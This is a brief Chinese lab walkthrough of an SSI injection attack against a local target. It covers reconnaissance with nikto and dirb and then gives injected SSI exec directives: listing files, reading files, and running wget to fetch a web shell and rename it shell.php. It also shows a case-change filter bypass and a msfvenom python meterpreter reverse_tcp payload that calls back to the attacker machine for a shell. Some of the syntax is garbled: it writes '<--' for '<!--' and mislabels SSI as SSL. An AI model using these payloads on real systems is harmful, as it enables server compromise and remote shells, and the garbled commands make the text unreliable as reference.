ssi是为了赋予html静态页面动态的效果,通过ssi执行系统命令,返回对应结果
若在网站目录中发现.stm,.shtm,.shtml,且网站对ssi的输入没有做到严格过滤,很可能收到ssi注入攻击
攻击机192.168.1.108
靶机192.168.1.109
nikto -host ip
+ Multiple index files found: /index.php, /index.shtml
dirb http://192.168.1.109
发现ssi可以注入
发现两个敏感文件
SSL注入漏洞
列举当前目录的文件和目录
<--#exec cmd="ls" -->
切换到指定目录
<--#exec cmd="cat /root/dir" -->
下载shell脚本,并重命名为shell.php
<--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" -->
target注释掉了<
feedback 注释掉了exec,将其改为大写,大小写绕过
但没有给出反馈
SSI注入需要加一个感叹号
反弹shell
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw > /root/Desktop/shell.py
攻击机启动监听
将shell移到/var/www/html根目录下,并开启apache
返回shell
sysinfo 查看系统信息
shell进入系统shell
优化终端